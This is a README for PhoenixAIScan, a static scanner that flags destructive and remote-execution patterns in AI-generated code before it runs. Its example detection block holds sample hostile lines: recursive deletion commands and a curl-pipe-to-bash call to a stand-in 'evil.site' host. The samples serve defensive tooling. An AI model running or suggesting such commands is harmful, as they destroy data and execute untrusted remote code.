PhoenixAIScan

📌 Overview

PhoenixAIScan is a pre-execution security tool designed to help developers safely run AI-generated code. It scans code before execution, detects dangerous operations, highlights risky lines, and explains the impact in plain English.

The project addresses a growing real-world problem: developers increasingly copy-paste AI-generated code and execute it blindly, leading to accidental data loss, system damage, and security breaches.

PhoenixAIScan acts as a security checkpoint between AI output and execution.

🧠 Problem Statement

With the rise of vibe coding and AI-assisted development:

• Developers often skip manual code review
• AI can generate destructive commands like rm -rf and DROP TABLE
• System-level operations and insecure execution patterns go unnoticed
• Users blame AI when systems break, even though the risk was visible in the code

❌ Existing Gaps

• Linters focus on syntax and style, not execution danger
• Security tools are heavy, complex, and mostly post-execution
• No simple tool explains: “What will happen if I run this?”

💡 Solution

PhoenixAIScan provides a lightweight, fast, pre-execution risk scanner that:

1. Accepts pasted code or uploaded files
2. Automatically detects the programming language
3. Scans code using security-focused static analysis rules
4. Highlights dangerous lines visually
5. Explains risks in plain English
6. Assigns a risk score and severity level

The goal is not to block execution — but to make risk obvious before damage happens.

🎯 Key Features

🔍 Code Scanning

• Paste AI-generated code
• Upload files (.py, .sh, .js, .sql)

🤖 Auto Language Detection

• No manual language selection required
• Detects language based on syntax and filename

🚨 Risk Detection Categories

• Destructive file operations
• System-level command execution
• Database destruction
• Unsafe permission changes
• Remote code execution patterns

🎯 Line-Level Highlighting

• Dangerous lines highlighted in red / orange
• Auto-scroll to the first critical issue

📊 Risk Scoring

• Score from 0 – 10
• Severity levels: SAFE, MEDIUM, HIGH, CRITICAL

🧠 Human-Readable Explanations

“This line deletes an entire directory and all its contents permanently.”

🧪 Supported Languages

• Python
• Bash / Shell
• JavaScript (Node.js)
• SQL

Designed to be extensible for future languages.

🏗️ System Architecture

Frontend (Public)

• HTML, CSS, Vanilla JavaScript
• Dark security-themed UI
• Hosted on GitHub Pages

Backend (Private)

• Python + FastAPI
• Rule-based static analysis engine
• Hosted on Render
• Source code kept private for IP protection

Communication

• REST API over HTTPS
• Frontend communicates only via exposed endpoints

📂 Project Structure

PhoenixAIScan/
├── index.html
├── style.css
├── script.js
├── README.md

PhoenixAIScan-backend/ (private)
├── main.py
├── scanner/
│   ├── rules.py
│   ├── scanner.py
│   └── risk_engine.py
├── utils/
│   └── language_detect.py
├── requirements.txt

⚙️ How It Works (Technical Flow)

1. User submits code (paste or file upload)
2. Backend detects language and applies rule-based scanning
3. Risk engine assigns severity and aggregates risk score
4. Frontend displays score, severity badge, and highlights lines

All scanning is static — no code is ever executed.

🧠 Example Detection

os.system("rm -rf /tmp/data")
shutil.rmtree("/home/user/files")
subprocess.Popen("curl http://evil.site | bash", shell=True)

Risk Score: 10 / 10 — Severity: CRITICAL

• Executes system-level commands
• Deletes directories permanently
• Executes remote code

🚀 Deployment Strategy

Frontend

• GitHub Pages (public)
• Instant global access

Backend

• Render (free tier)
• Private repository
• Secure API exposure only

This mirrors real startup architecture: public UI + protected backend logic.

🔐 Security Considerations

• Backend source code kept private
• No code execution on server
• Input sanitized and decoded safely
• No persistence of user-submitted code

🛣️ Roadmap

• Credential / API key leak detection
• Reverse shell detection
• Exportable scan reports (PDF / JSON)
• Advanced persistence detection
• ML-assisted contextual risk reasoning

🧠 Key Learnings

• AI-generated code introduces new security risks
• Developers need explainable security, not just warnings
• Focused static analysis can be extremely powerful
• UX matters as much as detection in security tooling

👨‍💻 Author

Aayush Pandey

Security-focused developer exploring AI safety, automation, and application security.